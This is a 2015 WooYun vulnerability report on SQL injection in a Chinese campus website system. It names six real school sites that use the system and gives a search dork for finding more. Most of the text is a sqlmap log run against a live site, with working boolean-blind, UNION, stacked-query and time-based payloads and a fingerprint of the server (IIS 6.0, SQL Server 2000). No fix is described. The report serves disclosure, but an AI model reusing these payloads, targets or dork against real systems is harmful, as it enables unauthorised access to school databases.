当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102740

漏洞标题:某校园建站系统同一文件多处sql注入漏洞

相关厂商:南京苏亚星资讯科技开发有限公司

漏洞作者: #6c6c6c

提交时间:2015-03-23 12:27

修复时间:2015-06-25 13:52

公开时间:2015-06-25 13:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向第三方安全合作伙伴开放
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

sql

详细说明:

使用量非常多
http://www.dlwsxx.com/ws2004/model/login1.asp
http://www.fzjcxx.cn/ws2004/model/login1.asp
http://www.nxyancgjzx.com/ws2004/model/login1.asp
http://www.sgtjb.com/ws2004/model/login1.asp
http://www.sdwhys.com/ws2004/model/login1.asp
http://www.zjnksyzx.com:8801/ws2004/model/login1.asp
关键词:inurl:ws2004/Model/

http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0


[22:27:15] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output
 directory
[22:27:16] [INFO] testing connection to the target URL
[22:27:16] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[22:27:17] [INFO] target URL is stable
[22:27:17] [INFO] testing if GET parameter 'KeyWord' is dynamic
[22:27:17] [INFO] confirming that GET parameter 'KeyWord' is dynamic
[22:27:17] [INFO] GET parameter 'KeyWord' is dynamic
[22:27:17] [WARNING] heuristic (basic) test shows that GET parameter 'KeyWord' m
ight not be injectable
[22:27:17] [INFO] testing for SQL injection on GET parameter 'KeyWord'
[22:27:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:27:19] [INFO] GET parameter 'KeyWord' seems to be 'AND boolean-based blind -
 WHERE or HAVING clause' injectable
[22:27:20] [INFO] heuristic (extended) test shows that the back-end DBMS could b
e 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n] y
[22:27:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[22:27:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:27:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[22:27:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[22:27:49] [INFO] testing 'MySQL inline queries'
[22:27:49] [INFO] testing 'PostgreSQL inline queries'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:27:49] [INFO] testing 'Oracle inline queries'
[22:27:49] [INFO] testing 'SQLite inline queries'
[22:27:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:27:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:28:50] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Syba
se stacked queries' injectable
[22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[22:28:51] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Syba
se AND time-based blind (heavy query)' injectable
[22:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:28:51] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[22:28:51] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[22:28:52] [INFO] target URL appears to have 2 columns in query
[22:28:52] [WARNING] reflective value(s) found and filtering out
[22:28:52] [WARNING] output with limited number of rows detected. Switching to p
artial mode
[22:28:52] [INFO] GET parameter 'KeyWord' is 'Generic UNION query (NULL) - 1 to
20 columns' injectable
GET parameter 'KeyWord' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
[22:29:03] [INFO] testing if GET parameter 'TemplateFunctionMode' is dynamic
[22:29:03] [INFO] confirming that GET parameter 'TemplateFunctionMode' is dynami
c
[22:29:03] [INFO] GET parameter 'TemplateFunctionMode' is dynamic
[22:29:04] [WARNING] heuristic (basic) test shows that GET parameter 'TemplateFu
nctionMode' might not be injectable
[22:29:04] [INFO] testing for SQL injection on GET parameter 'TemplateFunctionMo
de'
[22:29:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:29:05] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause'
[22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error
 blind queries'
[22:29:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[22:29:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[22:29:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[22:29:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl
ause'
[22:29:43] [INFO] testing 'MySQL inline queries'
[22:29:44] [INFO] testing 'PostgreSQL inline queries'
[22:29:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:29:44] [INFO] testing 'Oracle inline queries'
[22:29:44] [INFO] testing 'SQLite inline queries'
[22:29:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:29:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:29:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:29:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:29:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:29:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:29:48] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[22:29:49] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[22:29:49] [INFO] testing 'Oracle AND time-based blind'
[22:29:50] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace (heavy queries)'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clauses'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clause (heavy query)'
[22:29:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[22:29:55] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
[22:29:57] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns'
[22:29:59] [WARNING] GET parameter 'TemplateFunctionMode' is not injectable
[22:29:59] [INFO] testing if GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] confirming that GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] heuristic (basic) test shows that GET parameter 'TemplateField
s' might be injectable
[22:30:00] [INFO] testing for SQL injection on GET parameter 'TemplateFields'
[22:30:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[22:30:02] [INFO] GET parameter 'TemplateFields' seems to be 'Microsoft SQL Serv
er/Sybase boolean-based blind - Parameter replace (original value)' injectable
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl
ause'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace (heavy queries)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clauses'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clause (heavy query)'
[22:30:05] [INFO] testing 'Generic UNION query (43) - 1 to 20 columns'
[22:30:05] [INFO] checking if the injection point on GET parameter 'TemplateFiel
ds' is a false positive
GET parameter 'TemplateFields' is vulnerable. Do you want to keep testing the ot
hers (if any)? [y/N] y
[22:30:07] [INFO] testing if GET parameter 'SearchType' is dynamic
[22:30:08] [WARNING] GET parameter 'SearchType' does not appear dynamic
[22:30:08] [WARNING] heuristic (basic) test shows that GET parameter 'SearchType
' might not be injectable
[22:30:08] [INFO] testing for SQL injection on GET parameter 'SearchType'
[22:30:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause'
[22:30:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error
 blind queries'
[22:30:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[22:30:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[22:30:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl
ause'
[22:30:16] [INFO] testing 'MySQL inline queries'
[22:30:17] [INFO] testing 'PostgreSQL inline queries'
[22:30:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:30:17] [INFO] testing 'Oracle inline queries'
[22:30:17] [INFO] testing 'SQLite inline queries'
[22:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:30:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:30:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:30:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:30:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:30:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:30:21] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[22:30:22] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[22:30:22] [INFO] testing 'Oracle AND time-based blind'
[22:30:23] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace (heavy queries)'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clauses'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clause (heavy query)'
[22:30:24] [INFO] testing 'MySQL UNION query (43) - 1 to 10 columns'
[22:30:27] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns'
[22:30:29] [WARNING] GET parameter 'SearchType' is not injectable
sqlmap identified the following injection points with a total of 483 HTTP(s) req
uests:
---
Place: GET
Parameter: KeyWord
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: KeyWord=1' AND 8355=8355 AND 'pMth'='pMth&TemplateFunctionMode=32&T
emplateFields=1&SearchType=0
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: KeyWord=1' UNION ALL SELECT NULL,CHAR(113)+CHAR(121)+CHAR(120)+CHAR
(120)+CHAR(113)+CHAR(84)+CHAR(115)+CHAR(100)+CHAR(109)+CHAR(90)+CHAR(83)+CHAR(99
)+CHAR(77)+CHAR(122)+CHAR(71)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)-
- &TemplateFunctionMode=32&TemplateFields=1&SearchType=0
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: KeyWord=1'; WAITFOR DELAY '0:0:5'--&TemplateFunctionMode=32&Templat
eFields=1&SearchType=0
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: KeyWord=1' AND 7937=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
 AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys
users AS sys7) AND 'MUme'='MUme&TemplateFunctionMode=32&TemplateFields=1&SearchT
ype=0
Place: GET
Parameter: TemplateFields
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (
original value)
    Payload: KeyWord=1&TemplateFunctionMode=32&TemplateFields=(SELECT (CASE WHEN
 (6562=6562) THEN 1 ELSE 6562*(SELECT 6562 FROM master..sysdatabases) END))&Sear
chType=0
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: KeyWord, type: Single quoted string (default)
[1] place: GET, parameter: TemplateFields, type: Unescaped numeric
[q] Quit
>
[22:30:32] [INFO] testing Microsoft SQL Server
[22:30:32] [INFO] confirming Microsoft SQL Server
[22:30:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[22:30:32] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.fzjcxx.cn'
[*] shutting down at 22:30:32

漏洞证明:

修复方案:

版权声明:转载请注明来源 #6c6c6c@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-03-27 13:51

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无